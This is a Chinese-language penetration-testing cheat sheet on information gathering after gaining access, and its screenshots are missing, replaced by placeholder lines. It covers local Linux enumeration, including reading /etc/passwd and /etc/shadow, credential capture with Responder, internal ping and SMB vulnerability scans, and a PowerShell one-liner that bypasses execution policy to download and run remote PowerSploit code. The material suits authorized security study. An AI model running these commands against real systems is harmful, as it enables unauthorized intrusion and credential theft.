基础信息

1.系统类型
cat /etc/issue查看系统名称

在这里插入图片描述

Lsb-release查看系统名称、版本号

在这里插入图片描述

2. 内核版本
uname –a 查看所有信息

在这里插入图片描述

ls /root |grep vmlinuz

在这里插入图片描述

3. 进程
ps aux 查看进程信息

在这里插入图片描述

ps –ef查看进程信息

在这里插入图片描述

4. 安装的软件包
使用dpkg –l查看安装的软件包

在这里插入图片描述

5. 服务配置
查看apache配置文件

在这里插入图片描述

6. 网络配置
查看网卡配置文件

在这里插入图片描述

查看dns配置文件

在这里插入图片描述

使用hostname查看主机名

在这里插入图片描述

使用iptables –L查看防火墙配置(注意需要root权限)

在这里插入图片描述

7. 网络通讯
使用netstat命令

在这里插入图片描述

netstat –antlp 查看tcp socket

在这里插入图片描述

使用route查看路由

在这里插入图片描述

8. 用户信息
Whoami查看当前用户

在这里插入图片描述

使用id查看当前用户id,组id

在这里插入图片描述

cat /etc/passwd查看密码信息

在这里插入图片描述

cat /etc/group查看用户组信息

在这里插入图片描述

cat /etc/shadow查看密码信息,需要root权限

在这里插入图片描述

9. 日志信息
sudo cat /var/log/syslog查看系统日志

在这里插入图片描述

使用w 、who、lastlog等命令查看登陆日志

在这里插入图片描述

10. Responder使用
可修改Responder.py抓取要获得的内容
只抓取ftp

在这里插入图片描述

python Responder.py -h -I eth0 -A -f

扩散信息收集

1.Windows

ICMP

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.111.%I | findstr "TTL="

netbios

nbtscan-1.0.35.exe 192.168.111.1/24

nmap:根据环境考虑是否安装

nmap -sn -PM 192.168.111.0/24

扫描smb共享,顺便扫描几个漏洞

nmap -sT -p 445,139,137  -T2 --open -v --script=smb-os-discovery.nse,smb-enum-shares.nse,smb-vuln-ms08-067.nse,smb-vuln-ms17-010.nse 192.168.111.0/24

在这里插入图片描述

2.Powershell

Invoke-TSPingSweep.ps1

Powershell -ep bypass
Import-Module .\Invoke-TSPingSweep.ps1
Invoke-TSPingSweep -StartAddress 192.168.111.1 -EndAddress 192.168.111.254 -ResolveHost -ScanPort -Port 3389 -TimeOut 500

Invoke-Portscan.ps1

Import-Module .\Invoke-Portscan.ps1
Invoke-Portscan -Hosts 192.168.111.0/24 -T 4 -ports '3389,445' 

一句话执行

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts 192.168.111.0/24 -T 4 -ports '3389,80' 
3.Linux

ICMP

for i in 192.168.111.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done

netbios

wget http://www.unixwiz.net/tools/nbtscan-source-1.0.35.tgz
tar xf nbtscan-source-1.0.35.tgz
make
chmod +x nbtscan
./nbtscan 192.168.111.1/24

arpscan

git clone https://github.com/attackdebris/arpscan.git
make
chmod +x arpscan
./arpscan
Logo

更多推荐